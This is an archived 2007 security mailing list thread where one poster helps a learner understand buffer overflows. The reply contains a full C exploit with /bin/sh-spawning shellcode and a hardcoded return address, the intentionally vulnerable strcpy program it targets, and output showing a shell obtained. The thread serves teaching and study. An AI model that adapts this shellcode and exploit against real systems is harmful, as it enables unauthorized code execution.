Vulnerability Development mailing list archives
Re: understanding buffer overflows
From: adimitro () gmail com
Date: 1 Nov 2007 14:01:38 -0000
Try this.. it is in C but you shouldn't have problems rewriting it.. In your example you are overrunning the buffer but you might not be overwriting the EIP .. try a bigger buffer -- Best Regards, Atanas /* Overflow written for: x86 Pentium 4 Linux version 2.6.5-7.104-default gcc version 3.3.3 SuSE Linux */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define MAX_BUF 530 #define RETADDR 0xbffff0c0 int main() { int i; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char buffer[MAX_BUF]; // fill the buffer with the return address //the address to be overwritten is 524 bytes from the addr of buffer for (i=0; i<MAX_BUF; i+=4) *(long *)&buffer[i] = RETADDR; memcpy(buffer, shellcode, sizeof(shellcode)); buffer[sizeof(shellcode)-1]='A'; //take care of an extra 0x00 // I compiled the code provided as "vuln" execlp("./vuln", "vuln", buffer, NULL); exit(0); } /* OUTPUT: ***@localhost:~> ./test sh-2.05b$ exit exit ***@localhost:~> */ OVERFLOWN CODE: #include <stdio.h> #include <stdlib.h> #include <string.h> int foo (char *input) { char buffer [512]; strcpy(buffer, input); return (0); } int main (int argc, char * argv[]) { if (argc > 1) foo(argv[1]); else printf("usage: %s string", argv[0]); exit (0); } - Show quoted text - On 31 Oct 2007 14:36:22 -0000, secacc7 () hotmail com <secacc7 () hotmail com> wrote: hello, my name is michael, im from austria - so my english is very bad. A few days ago i begin to experiment with bufferoverflows in linux. i wrote a little c++ programm like this: #include < string.h> void main() { char buffer[10]; char COPY[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."; strcpy((char *)buffer,(char *)COPY); } k, this works very well, i got a core dump and have startet gdb. but in the output from "info all" was eip not overwritten so i put a few lines in the program to output addresses from functions and variables. addresses from functions where over 0 (eg (dec)500000) and addresses from vars under 0 (eg -5000000) i think this is maybe the problem - but why? output from gdb: eax 0x0 0 ecx 0x41414141 1094795585 edx 0x1d7 471 ebx 0xb7e27ff4 -1209892876 esp 0x4141413d 0x4141413d ebp 0x41414141 0x41414141 esi 0xb7f77ce0 -1208517408 edi 0x0 0 eip 0x80484ad 0x80484ad eflags 0x210286 [ PF SF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 hope anybody can help me understand/learn. greets from austria, michael
Current thread:
- Re: understanding buffer overflows 3APA3A (Nov 01)
- <Possible follow-ups>
- Re: understanding buffer overflows adimitro (Nov 01)
- Re: Re: understanding buffer overflows ma (Nov 02)
- Re: Re: understanding buffer overflows secacc7 (Nov 02)
- Re: understanding buffer overflows Ben Petering (Nov 05)
- Re: understanding buffer overflows Chris Eagle (Nov 05)